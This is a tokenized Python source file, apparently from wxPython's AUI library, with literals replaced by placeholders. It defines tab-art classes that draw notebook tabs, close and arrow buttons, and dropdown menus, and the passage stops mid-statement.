<s> """<STR_LIT>""" <EOL> __author__ = "<STR_LIT>" <EOL> __date__ = "<STR_LIT>" <EOL> import wx <EOL> if wx . Platform == '<STR_LIT>' : <EOL> import Carbon . Appearance <EOL> from aui_utilities import BitmapFromBits , StepColour , IndentPressedBitmap , ChopText <EOL> from aui_utilities import GetBaseColour , DrawMACCloseButton , LightColour , TakeScreenShot <EOL> from aui_utilities import CopyAttributes <EOL> from aui_constants import * <EOL> class AuiCommandCapture ( wx . PyEvtHandler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> wx . PyEvtHandler . __init__ ( self ) <EOL> self . _last_id = <NUM_LIT:0> <EOL> def GetCommandId ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _last_id <EOL> def ProcessEvent ( self , event ) : <EOL> """<STR_LIT>""" <EOL> if event . GetEventType ( ) == wx . wxEVT_COMMAND_MENU_SELECTED : <EOL> self . _last_id = event . GetId ( ) <EOL> return True <EOL> if self . GetNextHandler ( ) : <EOL> return self . GetNextHandler ( ) . ProcessEvent ( event ) <EOL> return False <EOL> class AuiDefaultTabArt ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _normal_font = wx . SystemSettings_GetFont ( wx . SYS_DEFAULT_GUI_FONT ) <EOL> self . _selected_font = wx . SystemSettings_GetFont ( wx . SYS_DEFAULT_GUI_FONT ) <EOL> self . _selected_font . SetWeight ( wx . BOLD ) <EOL> self . _measuring_font = self . _selected_font <EOL> self . _fixed_tab_width = <NUM_LIT:100> <EOL> self . _tab_ctrl_height = <NUM_LIT:0> <EOL> self . _buttonRect = wx . Rect ( ) <EOL> self . SetDefaultColours ( ) <EOL> if wx . Platform == "<STR_LIT>" : <EOL> bmp_colour = wx . SystemSettings . GetColour ( wx . SYS_COLOUR_3DDKSHADOW ) <EOL> self . _active_close_bmp = DrawMACCloseButton ( bmp_colour ) <EOL> self . _disabled_close_bmp = DrawMACCloseButton ( wx . Colour ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> else : <EOL> self . _active_close_bmp = BitmapFromBits ( nb_close_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . BLACK ) <EOL> self . _disabled_close_bmp = BitmapFromBits ( nb_close_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . Colour ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . _hover_close_bmp = self . _active_close_bmp <EOL> self . _pressed_close_bmp = self . _active_close_bmp <EOL> self . _active_left_bmp = BitmapFromBits ( nb_left_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . BLACK ) <EOL> self . _disabled_left_bmp = BitmapFromBits ( nb_left_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . Colour ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . _active_right_bmp = BitmapFromBits ( nb_right_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . BLACK ) <EOL> self . _disabled_right_bmp = BitmapFromBits ( nb_right_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . Colour ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . _active_windowlist_bmp = BitmapFromBits ( nb_list_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . BLACK ) <EOL> self . _disabled_windowlist_bmp = BitmapFromBits ( nb_list_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . Colour ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> if wx . Platform == "<STR_LIT>" : <EOL> if hasattr ( wx , '<STR_LIT>' ) : <EOL> c = wx . MacThemeColour ( Carbon . Appearance . kThemeBrushFocusHighlight ) <EOL> else : <EOL> brush = wx . Brush ( wx . BLACK ) <EOL> brush . MacSetTheme ( Carbon . Appearance . kThemeBrushFocusHighlight ) <EOL> c = brush . GetColour ( ) <EOL> self . _focusPen = wx . Pen ( c , <NUM_LIT:2> , wx . SOLID ) <EOL> else : <EOL> self . _focusPen = wx . Pen ( wx . BLACK , <NUM_LIT:1> , wx . USER_DASH ) <EOL> self . _focusPen . SetDashes ( [ <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> self . _focusPen . SetCap ( wx . CAP_BUTT ) <EOL> def SetBaseColour ( self , base_colour ) : <EOL> """<STR_LIT>""" <EOL> self . _base_colour = base_colour <EOL> self . _base_colour_pen = wx . Pen ( self . _base_colour ) <EOL> self . _base_colour_brush = wx . Brush ( self . _base_colour ) <EOL> def SetDefaultColours ( self , base_colour = None ) : <EOL> """<STR_LIT>""" <EOL> if base_colour is None : <EOL> base_colour = GetBaseColour ( ) <EOL> self . SetBaseColour ( base_colour ) <EOL> self . _border_colour = StepColour ( base_colour , <NUM_LIT> ) <EOL> self . _border_pen = wx . Pen ( self . _border_colour ) <EOL> self . _background_top_colour = StepColour ( self . _base_colour , <NUM_LIT> ) <EOL> self . _background_bottom_colour = StepColour ( self . _base_colour , <NUM_LIT> ) <EOL> self . _tab_top_colour = self . _base_colour <EOL> self . _tab_bottom_colour = wx . WHITE <EOL> self . _tab_gradient_highlight_colour = wx . WHITE <EOL> self . _tab_inactive_top_colour = self . _base_colour <EOL> self . _tab_inactive_bottom_colour = StepColour ( self . _tab_inactive_top_colour , <NUM_LIT> ) <EOL> self . _tab_text_colour = lambda page : page . text_colour <EOL> self . _tab_disabled_text_colour = wx . SystemSettings . GetColour ( wx . SYS_COLOUR_GRAYTEXT ) <EOL> def Clone ( self ) : <EOL> """<STR_LIT>""" <EOL> art = type ( self ) ( ) <EOL> art . SetNormalFont ( self . GetNormalFont ( ) ) <EOL> art . SetSelectedFont ( self . GetSelectedFont ( ) ) <EOL> art . SetMeasuringFont ( self . GetMeasuringFont ( ) ) <EOL> art = CopyAttributes ( art , self ) <EOL> return art <EOL> def SetAGWFlags ( self , agwFlags ) : <EOL> """<STR_LIT>""" <EOL> self . _agwFlags = agwFlags <EOL> def GetAGWFlags ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _agwFlags <EOL> def SetSizingInfo ( self , tab_ctrl_size , tab_count , minMaxTabWidth ) : <EOL> """<STR_LIT>""" <EOL> self . _fixed_tab_width = <NUM_LIT:100> <EOL> minTabWidth , maxTabWidth = minMaxTabWidth <EOL> tot_width = tab_ctrl_size . x - self . GetIndentSize ( ) - <NUM_LIT:4> <EOL> agwFlags = self . GetAGWFlags ( ) <EOL> if agwFlags & AUI_NB_CLOSE_BUTTON : <EOL> tot_width -= self . _active_close_bmp . GetWidth ( ) <EOL> if agwFlags & AUI_NB_WINDOWLIST_BUTTON : <EOL> tot_width -= self . _active_windowlist_bmp . GetWidth ( ) <EOL> if tab_count > <NUM_LIT:0> : <EOL> self . _fixed_tab_width = tot_width / tab_count <EOL> if self . _fixed_tab_width < <NUM_LIT:100> : <EOL> self . _fixed_tab_width = <NUM_LIT:100> <EOL> if self . _fixed_tab_width > tot_width / <NUM_LIT:2> : <EOL> self . _fixed_tab_width = tot_width / <NUM_LIT:2> <EOL> if self . _fixed_tab_width > <NUM_LIT> : <EOL> self . _fixed_tab_width = <NUM_LIT> <EOL> if minTabWidth > - <NUM_LIT:1> : <EOL> self . _fixed_tab_width = max ( self . _fixed_tab_width , minTabWidth ) <EOL> if maxTabWidth > - <NUM_LIT:1> : <EOL> self . _fixed_tab_width = min ( self . _fixed_tab_width , maxTabWidth ) <EOL> self . _tab_ctrl_height = tab_ctrl_size . y <EOL> def DrawBackground ( self , dc , wnd , rect ) : <EOL> """<STR_LIT>""" <EOL> self . _buttonRect = wx . Rect ( ) <EOL> agwFlags = self . GetAGWFlags ( ) <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> r = wx . Rect ( rect . x , rect . y , rect . width + <NUM_LIT:2> , rect . height ) <EOL> else : <EOL> r = wx . Rect ( rect . x , rect . y , rect . width + <NUM_LIT:2> , rect . height - <NUM_LIT:3> ) <EOL> dc . GradientFillLinear ( r , self . _background_top_colour , self . _background_bottom_colour , wx . SOUTH ) <EOL> dc . SetPen ( self . _border_pen ) <EOL> y = rect . GetHeight ( ) <EOL> w = rect . GetWidth ( ) <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> dc . SetBrush ( wx . Brush ( self . _background_bottom_colour ) ) <EOL> dc . DrawRectangle ( - <NUM_LIT:1> , <NUM_LIT:0> , w + <NUM_LIT:2> , <NUM_LIT:4> ) <EOL> else : <EOL> dc . SetBrush ( self . _base_colour_brush ) <EOL> dc . DrawRectangle ( - <NUM_LIT:1> , y - <NUM_LIT:4> , w + <NUM_LIT:2> , <NUM_LIT:4> ) <EOL> def DrawTab ( self , dc , wnd , page , in_rect , close_button_state , paint_control = False ) : <EOL> """<STR_LIT>""" <EOL> caption = page . caption <EOL> if not caption : <EOL> caption = "<STR_LIT>" <EOL> dc . SetFont ( self . _selected_font ) <EOL> selected_textx , selected_texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> dc . SetFont ( self . _normal_font ) <EOL> normal_textx , normal_texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> control = page . control <EOL> tab_size , x_extent = self . GetTabSize ( dc , wnd , page . caption , page . bitmap , <EOL> page . active , close_button_state , control ) <EOL> tab_height = self . _tab_ctrl_height - <NUM_LIT:3> <EOL> tab_width = tab_size [ <NUM_LIT:0> ] <EOL> tab_x = in_rect . x <EOL> tab_y = in_rect . y + in_rect . height - tab_height <EOL> caption = page . caption <EOL> if page . active : <EOL> dc . SetFont ( self . _selected_font ) <EOL> textx , texty = selected_textx , selected_texty <EOL> else : <EOL> dc . SetFont ( self . _normal_font ) <EOL> textx , texty = normal_textx , normal_texty <EOL> if not page . enabled : <EOL> dc . SetTextForeground ( self . _tab_disabled_text_colour ) <EOL> pagebitmap = page . dis_bitmap <EOL> else : <EOL> dc . SetTextForeground ( self . _tab_text_colour ( page ) ) <EOL> pagebitmap = page . bitmap <EOL> clip_width = tab_width <EOL> if tab_x + clip_width > in_rect . x + in_rect . width : <EOL> clip_width = in_rect . x + in_rect . width - tab_x <EOL> dc . SetClippingRegion ( tab_x , tab_y , clip_width + <NUM_LIT:1> , tab_height - <NUM_LIT:3> ) <EOL> border_points = [ wx . Point ( ) for i in xrange ( <NUM_LIT:6> ) ] <EOL> agwFlags = self . GetAGWFlags ( ) <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> border_points [ <NUM_LIT:0> ] = wx . Point ( tab_x , tab_y ) <EOL> border_points [ <NUM_LIT:1> ] = wx . Point ( tab_x , tab_y + tab_height - <NUM_LIT:6> ) <EOL> border_points [ <NUM_LIT:2> ] = wx . Point ( tab_x + <NUM_LIT:2> , tab_y + tab_height - <NUM_LIT:4> ) <EOL> border_points [ <NUM_LIT:3> ] = wx . Point ( tab_x + tab_width - <NUM_LIT:2> , tab_y + tab_height - <NUM_LIT:4> ) <EOL> border_points [ <NUM_LIT:4> ] = wx . Point ( tab_x + tab_width , tab_y + tab_height - <NUM_LIT:6> ) <EOL> border_points [ <NUM_LIT:5> ] = wx . Point ( tab_x + tab_width , tab_y ) <EOL> else : <EOL> border_points [ <NUM_LIT:0> ] = wx . Point ( tab_x , tab_y + tab_height - <NUM_LIT:4> ) <EOL> border_points [ <NUM_LIT:1> ] = wx . Point ( tab_x , tab_y + <NUM_LIT:2> ) <EOL> border_points [ <NUM_LIT:2> ] = wx . Point ( tab_x + <NUM_LIT:2> , tab_y ) <EOL> border_points [ <NUM_LIT:3> ] = wx . Point ( tab_x + tab_width - <NUM_LIT:2> , tab_y ) <EOL> border_points [ <NUM_LIT:4> ] = wx . Point ( tab_x + tab_width , tab_y + <NUM_LIT:2> ) <EOL> border_points [ <NUM_LIT:5> ] = wx . Point ( tab_x + tab_width , tab_y + tab_height - <NUM_LIT:4> ) <EOL> drawn_tab_yoff = border_points [ <NUM_LIT:1> ] . y <EOL> drawn_tab_height = border_points [ <NUM_LIT:0> ] . y - border_points [ <NUM_LIT:1> ] . y <EOL> if page . active : <EOL> r = wx . Rect ( tab_x , tab_y , tab_width , tab_height ) <EOL> dc . SetPen ( self . _base_colour_pen ) <EOL> dc . SetBrush ( self . _base_colour_brush ) <EOL> dc . DrawRectangle ( r . x + <NUM_LIT:1> , r . y + <NUM_LIT:1> , r . width - <NUM_LIT:1> , r . height - <NUM_LIT:4> ) <EOL> dc . SetPen ( wx . Pen ( self . _tab_gradient_highlight_colour ) ) <EOL> dc . SetBrush ( wx . Brush ( self . _tab_gradient_highlight_colour ) ) <EOL> dc . DrawRectangle ( r . x + <NUM_LIT:2> , r . y + <NUM_LIT:1> , r . width - <NUM_LIT:3> , r . height - <NUM_LIT:4> ) <EOL> dc . SetPen ( self . _base_colour_pen ) <EOL> dc . DrawPoint ( r . x + <NUM_LIT:2> , r . y + <NUM_LIT:1> ) <EOL> dc . DrawPoint ( r . x + r . width - <NUM_LIT:2> , r . y + <NUM_LIT:1> ) <EOL> r . SetHeight ( r . GetHeight ( ) / <NUM_LIT:2> ) <EOL> r . x += <NUM_LIT:2> <EOL> r . width -= <NUM_LIT:2> <EOL> r . y += r . height <EOL> r . y -= <NUM_LIT:2> <EOL> top_colour = self . _tab_bottom_colour <EOL> bottom_colour = self . _tab_top_colour <EOL> dc . GradientFillLinear ( r , bottom_colour , top_colour , wx . NORTH ) <EOL> else : <EOL> r = wx . Rect ( tab_x , tab_y + <NUM_LIT:1> , tab_width , tab_height - <NUM_LIT:3> ) <EOL> r . x += <NUM_LIT:3> <EOL> r . y += <NUM_LIT:1> <EOL> r . width -= <NUM_LIT:4> <EOL> r . height /= <NUM_LIT:2> <EOL> r . height -= <NUM_LIT:1> <EOL> top_colour = self . _tab_inactive_top_colour <EOL> bottom_colour = self . _tab_inactive_bottom_colour <EOL> dc . GradientFillLinear ( r , bottom_colour , top_colour , wx . NORTH ) <EOL> r . y += r . height <EOL> r . y -= <NUM_LIT:1> <EOL> top_colour = self . _tab_inactive_bottom_colour <EOL> bottom_colour = self . _tab_inactive_bottom_colour <EOL> dc . GradientFillLinear ( r , top_colour , bottom_colour , wx . SOUTH ) <EOL> dc . SetPen ( self . _border_pen ) <EOL> dc . SetBrush ( wx . TRANSPARENT_BRUSH ) <EOL> dc . DrawPolygon ( border_points ) <EOL> if page . active : <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> dc . SetPen ( wx . Pen ( self . _background_bottom_colour ) ) <EOL> else : <EOL> dc . SetPen ( self . _base_colour_pen ) <EOL> dc . DrawLine ( border_points [ <NUM_LIT:0> ] . x + <NUM_LIT:1> , <EOL> border_points [ <NUM_LIT:0> ] . y , <EOL> border_points [ <NUM_LIT:5> ] . x , <EOL> border_points [ <NUM_LIT:5> ] . y ) <EOL> text_offset = tab_x + <NUM_LIT:8> <EOL> close_button_width = <NUM_LIT:0> <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> close_button_width = self . _active_close_bmp . GetWidth ( ) <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> text_offset += close_button_width - <NUM_LIT:5> <EOL> bitmap_offset = <NUM_LIT:0> <EOL> if pagebitmap . IsOk ( ) : <EOL> bitmap_offset = tab_x + <NUM_LIT:8> <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT and close_button_width : <EOL> bitmap_offset += close_button_width - <NUM_LIT:5> <EOL> dc . DrawBitmap ( pagebitmap , <EOL> bitmap_offset , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( pagebitmap . GetHeight ( ) / <NUM_LIT:2> ) , <EOL> True ) <EOL> text_offset = bitmap_offset + pagebitmap . GetWidth ( ) <EOL> text_offset += <NUM_LIT:3> <EOL> else : <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT == <NUM_LIT:0> or not close_button_width : <EOL> text_offset = tab_x + <NUM_LIT:8> <EOL> draw_text = ChopText ( dc , caption , tab_width - ( text_offset - tab_x ) - close_button_width ) <EOL> ypos = drawn_tab_yoff + ( drawn_tab_height ) / <NUM_LIT:2> - ( texty / <NUM_LIT:2> ) - <NUM_LIT:1> <EOL> offset_focus = text_offset <EOL> if control is not None : <EOL> if control . GetPosition ( ) != wx . Point ( text_offset + <NUM_LIT:1> , ypos ) : <EOL> control . SetPosition ( wx . Point ( text_offset + <NUM_LIT:1> , ypos ) ) <EOL> if not control . IsShown ( ) : <EOL> control . Show ( ) <EOL> if paint_control : <EOL> bmp = TakeScreenShot ( control . GetScreenRect ( ) ) <EOL> dc . DrawBitmap ( bmp , text_offset + <NUM_LIT:1> , ypos , True ) <EOL> controlW , controlH = control . GetSize ( ) <EOL> text_offset += controlW + <NUM_LIT:4> <EOL> textx += controlW + <NUM_LIT:4> <EOL> rectx , recty , dummy = dc . GetMultiLineTextExtent ( draw_text ) <EOL> dc . DrawLabel ( draw_text , wx . Rect ( text_offset , ypos , rectx , recty ) ) <EOL> if ( agwFlags & AUI_NB_NO_TAB_FOCUS ) == <NUM_LIT:0> : <EOL> self . DrawFocusRectangle ( dc , page , wnd , draw_text , offset_focus , bitmap_offset , drawn_tab_yoff , drawn_tab_height , rectx , recty ) <EOL> out_button_rect = wx . Rect ( ) <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> bmp = self . _disabled_close_bmp <EOL> if close_button_state == AUI_BUTTON_STATE_HOVER : <EOL> bmp = self . _hover_close_bmp <EOL> elif close_button_state == AUI_BUTTON_STATE_PRESSED : <EOL> bmp = self . _pressed_close_bmp <EOL> shift = ( agwFlags & AUI_NB_BOTTOM and [ <NUM_LIT:1> ] or [ <NUM_LIT:0> ] ) [ <NUM_LIT:0> ] <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> rect = wx . Rect ( tab_x + <NUM_LIT:4> , tab_y + ( tab_height - bmp . GetHeight ( ) ) / <NUM_LIT:2> - shift , <EOL> close_button_width , tab_height ) <EOL> else : <EOL> rect = wx . Rect ( tab_x + tab_width - close_button_width - <NUM_LIT:1> , <EOL> tab_y + ( tab_height - bmp . GetHeight ( ) ) / <NUM_LIT:2> - shift , <EOL> close_button_width , tab_height ) <EOL> rect = IndentPressedBitmap ( rect , close_button_state ) <EOL> dc . DrawBitmap ( bmp , rect . x , rect . y , True ) <EOL> out_button_rect = rect <EOL> out_tab_rect = wx . Rect ( tab_x , tab_y , tab_width , tab_height ) <EOL> dc . DestroyClippingRegion ( ) <EOL> return out_tab_rect , out_button_rect , x_extent <EOL> def SetCustomButton ( self , bitmap_id , button_state , bmp ) : <EOL> """<STR_LIT>""" <EOL> if bitmap_id == AUI_BUTTON_CLOSE : <EOL> if button_state == AUI_BUTTON_STATE_NORMAL : <EOL> self . _active_close_bmp = bmp <EOL> self . _hover_close_bmp = self . _active_close_bmp <EOL> self . _pressed_close_bmp = self . _active_close_bmp <EOL> self . _disabled_close_bmp = self . _active_close_bmp <EOL> elif button_state == AUI_BUTTON_STATE_HOVER : <EOL> self . _hover_close_bmp = bmp <EOL> elif button_state == AUI_BUTTON_STATE_PRESSED : <EOL> self . _pressed_close_bmp = bmp <EOL> else : <EOL> self . _disabled_close_bmp = bmp <EOL> elif bitmap_id == AUI_BUTTON_LEFT : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> self . _disabled_left_bmp = bmp <EOL> else : <EOL> self . _active_left_bmp = bmp <EOL> elif bitmap_id == AUI_BUTTON_RIGHT : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> self . _disabled_right_bmp = bmp <EOL> else : <EOL> self . _active_right_bmp = bmp <EOL> elif bitmap_id == AUI_BUTTON_WINDOWLIST : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> self . _disabled_windowlist_bmp = bmp <EOL> else : <EOL> self . _active_windowlist_bmp = bmp <EOL> def GetIndentSize ( self ) : <EOL> """<STR_LIT>""" <EOL> return <NUM_LIT:5> <EOL> def GetTabSize ( self , dc , wnd , caption , bitmap , active , close_button_state , control = None ) : <EOL> """<STR_LIT>""" <EOL> dc . SetFont ( self . _measuring_font ) <EOL> measured_textx , measured_texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> tab_width = measured_textx <EOL> tab_height = measured_texty <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> tab_width += self . _active_close_bmp . GetWidth ( ) + <NUM_LIT:3> <EOL> if bitmap . IsOk ( ) : <EOL> tab_width += bitmap . GetWidth ( ) <EOL> tab_width += <NUM_LIT:3> <EOL> tab_height = max ( tab_height , bitmap . GetHeight ( ) ) <EOL> tab_width += <NUM_LIT:16> <EOL> tab_height += <NUM_LIT:10> <EOL> agwFlags = self . GetAGWFlags ( ) <EOL> if agwFlags & AUI_NB_TAB_FIXED_WIDTH : <EOL> tab_width = self . _fixed_tab_width <EOL> if control is not None : <EOL> tab_width += control . GetSize ( ) . GetWidth ( ) + <NUM_LIT:4> <EOL> x_extent = tab_width <EOL> return ( tab_width , tab_height ) , x_extent <EOL> def DrawButton ( self , dc , wnd , in_rect , button , orientation ) : <EOL> """<STR_LIT>""" <EOL> bitmap_id , button_state = button . id , button . cur_state <EOL> if bitmap_id == AUI_BUTTON_CLOSE : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> bmp = self . _disabled_close_bmp <EOL> elif button_state & AUI_BUTTON_STATE_HOVER : <EOL> bmp = self . _hover_close_bmp <EOL> elif button_state & AUI_BUTTON_STATE_PRESSED : <EOL> bmp = self . _pressed_close_bmp <EOL> else : <EOL> bmp = self . _active_close_bmp <EOL> elif bitmap_id == AUI_BUTTON_LEFT : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> bmp = self . _disabled_left_bmp <EOL> else : <EOL> bmp = self . _active_left_bmp <EOL> elif bitmap_id == AUI_BUTTON_RIGHT : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> bmp = self . _disabled_right_bmp <EOL> else : <EOL> bmp = self . _active_right_bmp <EOL> elif bitmap_id == AUI_BUTTON_WINDOWLIST : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> bmp = self . _disabled_windowlist_bmp <EOL> else : <EOL> bmp = self . _active_windowlist_bmp <EOL> else : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> bmp = button . dis_bitmap <EOL> else : <EOL> bmp = button . bitmap <EOL> if not bmp . IsOk ( ) : <EOL> return <EOL> rect = wx . Rect ( * in_rect ) <EOL> if orientation == wx . LEFT : <EOL> rect . SetX ( in_rect . x ) <EOL> rect . SetY ( ( ( in_rect . y + in_rect . height ) / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) ) <EOL> rect . SetWidth ( bmp . GetWidth ( ) ) <EOL> rect . SetHeight ( bmp . GetHeight ( ) ) <EOL> else : <EOL> rect = wx . Rect ( in_rect . x + in_rect . width - bmp . GetWidth ( ) , <EOL> ( ( in_rect . y + in_rect . height ) / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) , <EOL> bmp . GetWidth ( ) , bmp . GetHeight ( ) ) <EOL> rect = IndentPressedBitmap ( rect , button_state ) <EOL> dc . DrawBitmap ( bmp , rect . x , rect . y , True ) <EOL> out_rect = rect <EOL> if bitmap_id == AUI_BUTTON_RIGHT : <EOL> self . _buttonRect = wx . Rect ( rect . x , rect . y , <NUM_LIT:30> , rect . height ) <EOL> return out_rect <EOL> def DrawFocusRectangle ( self , dc , page , wnd , draw_text , text_offset , bitmap_offset , drawn_tab_yoff , drawn_tab_height , textx , texty ) : <EOL> """<STR_LIT>""" <EOL> if self . GetAGWFlags ( ) & AUI_NB_NO_TAB_FOCUS : <EOL> return <EOL> if page . active and wx . Window . FindFocus ( ) == wnd : <EOL> focusRectText = wx . Rect ( text_offset , ( drawn_tab_yoff + ( drawn_tab_height ) / <NUM_LIT:2> - ( texty / <NUM_LIT:2> ) ) , <EOL> textx , texty ) <EOL> if page . bitmap . IsOk ( ) : <EOL> focusRectBitmap = wx . Rect ( bitmap_offset , drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( page . bitmap . GetHeight ( ) / <NUM_LIT:2> ) , <EOL> page . bitmap . GetWidth ( ) , page . bitmap . GetHeight ( ) ) <EOL> if page . bitmap . IsOk ( ) and draw_text == "<STR_LIT>" : <EOL> focusRect = wx . Rect ( * focusRectBitmap ) <EOL> elif not page . bitmap . IsOk ( ) and draw_text != "<STR_LIT>" : <EOL> focusRect = wx . Rect ( * focusRectText ) <EOL> elif page . bitmap . IsOk ( ) and draw_text != "<STR_LIT>" : <EOL> focusRect = focusRectText . Union ( focusRectBitmap ) <EOL> focusRect . Inflate ( <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> dc . SetBrush ( wx . TRANSPARENT_BRUSH ) <EOL> dc . SetPen ( self . _focusPen ) <EOL> dc . DrawRoundedRectangleRect ( focusRect , <NUM_LIT:2> ) <EOL> def GetBestTabCtrlSize ( self , wnd , pages , required_bmp_size ) : <EOL> """<STR_LIT>""" <EOL> dc = wx . ClientDC ( wnd ) <EOL> dc . SetFont ( self . _measuring_font ) <EOL> measure_bmp = wx . NullBitmap <EOL> if required_bmp_size . IsFullySpecified ( ) : <EOL> measure_bmp = wx . EmptyBitmap ( required_bmp_size . x , <EOL> required_bmp_size . y ) <EOL> max_y = <NUM_LIT:0> <EOL> for page in pages : <EOL> if measure_bmp . IsOk ( ) : <EOL> bmp = measure_bmp <EOL> else : <EOL> bmp = page . bitmap <EOL> s , x_ext = self . GetTabSize ( dc , wnd , page . caption , bmp , True , AUI_BUTTON_STATE_HIDDEN , None ) <EOL> max_y = max ( max_y , s [ <NUM_LIT:1> ] ) <EOL> if page . control : <EOL> controlW , controlH = page . control . GetSize ( ) <EOL> max_y = max ( max_y , controlH + <NUM_LIT:4> ) <EOL> return max_y + <NUM_LIT:2> <EOL> def SetNormalFont ( self , font ) : <EOL> """<STR_LIT>""" <EOL> self . _normal_font = font <EOL> def SetSelectedFont ( self , font ) : <EOL> """<STR_LIT>""" <EOL> self . _selected_font = font <EOL> def SetMeasuringFont ( self , font ) : <EOL> """<STR_LIT>""" <EOL> self . _measuring_font = font <EOL> def GetNormalFont ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _normal_font <EOL> def GetSelectedFont ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _selected_font <EOL> def GetMeasuringFont ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _measuring_font <EOL> def ShowDropDown ( self , wnd , pages , active_idx ) : <EOL> """<STR_LIT>""" <EOL> useImages = self . GetAGWFlags ( ) & AUI_NB_USE_IMAGES_DROPDOWN <EOL> menuPopup = wx . Menu ( ) <EOL> longest = <NUM_LIT:0> <EOL> for i , page in enumerate ( pages ) : <EOL> caption = page . caption <EOL> if caption == "<STR_LIT>" : <EOL> caption = "<STR_LIT:U+0020>" <EOL> width = wnd . GetTextExtent ( caption ) [ <NUM_LIT:0> ] <EOL> if width > longest : <EOL> longest = width <EOL> if useImages : <EOL> menuItem = wx . MenuItem ( menuPopup , <NUM_LIT:1000> + i , caption ) <EOL> if page . bitmap : <EOL> menuItem . SetBitmap ( page . bitmap ) <EOL> menuPopup . AppendItem ( menuItem ) <EOL> else : <EOL> menuPopup . AppendCheckItem ( <NUM_LIT:1000> + i , caption ) <EOL> menuPopup . Enable ( <NUM_LIT:1000> + i , page . enabled ) <EOL> if active_idx != - <NUM_LIT:1> and not useImages : <EOL> menuPopup . Check ( <NUM_LIT:1000> + active_idx , True ) <EOL> cli_rect = wnd . GetClientRect ( ) <EOL> if wx . Platform in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> longest += <NUM_LIT:32> <EOL> longest += <NUM_LIT:20> <EOL> if self . GetAGWFlags ( ) & AUI_NB_CLOSE_BUTTON : <EOL> longest += <NUM_LIT:16> <EOL> pt = wx . Point ( cli_rect . x + cli_rect . GetWidth ( ) - longest , <EOL> cli_rect . y + cli_rect . height ) <EOL> cc = AuiCommandCapture ( ) <EOL> wnd . PushEventHandler ( cc ) <EOL> wnd . PopupMenu ( menuPopup , pt ) <EOL> command = cc . GetCommandId ( ) <EOL> wnd . PopEventHandler ( True ) <EOL> if command >= <NUM_LIT:1000> : <EOL> return command - <NUM_LIT:1000> <EOL> return - <NUM_LIT:1> <EOL> class AuiSimpleTabArt ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _normal_font = wx . SystemSettings . GetFont ( wx . SYS_DEFAULT_GUI_FONT ) <EOL> self . _selected_font = wx . SystemSettings . GetFont ( wx . SYS_DEFAULT_GUI_FONT ) <EOL> self . _selected_font . SetWeight ( wx . BOLD ) <EOL> self . _measuring_font = self . _selected_font <EOL> self . _agwFlags = <NUM_LIT:0> <EOL> self . _fixed_tab_width = <NUM_LIT:100> <EOL> base_colour = wx . SystemSettings . GetColour ( wx . SYS_COLOUR_3DFACE ) <EOL> background_colour = base_colour <EOL> normaltab_colour = base_colour <EOL> selectedtab_colour = wx . WHITE <EOL> self . _bkbrush = wx . Brush ( background_colour ) <EOL> self . _normal_bkbrush = wx . Brush ( normaltab_colour ) <EOL> self . _normal_bkpen = wx . Pen ( normaltab_colour ) <EOL> self . _selected_bkbrush = wx . Brush ( selectedtab_colour ) <EOL> self . _selected_bkpen = wx . Pen ( selectedtab_colour ) <EOL> self . _active_close_bmp = BitmapFromBits ( nb_close_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . BLACK ) <EOL> self . _disabled_close_bmp = BitmapFromBits ( nb_close_bits , <NUM_LIT:16> , <NUM_LIT:16> , 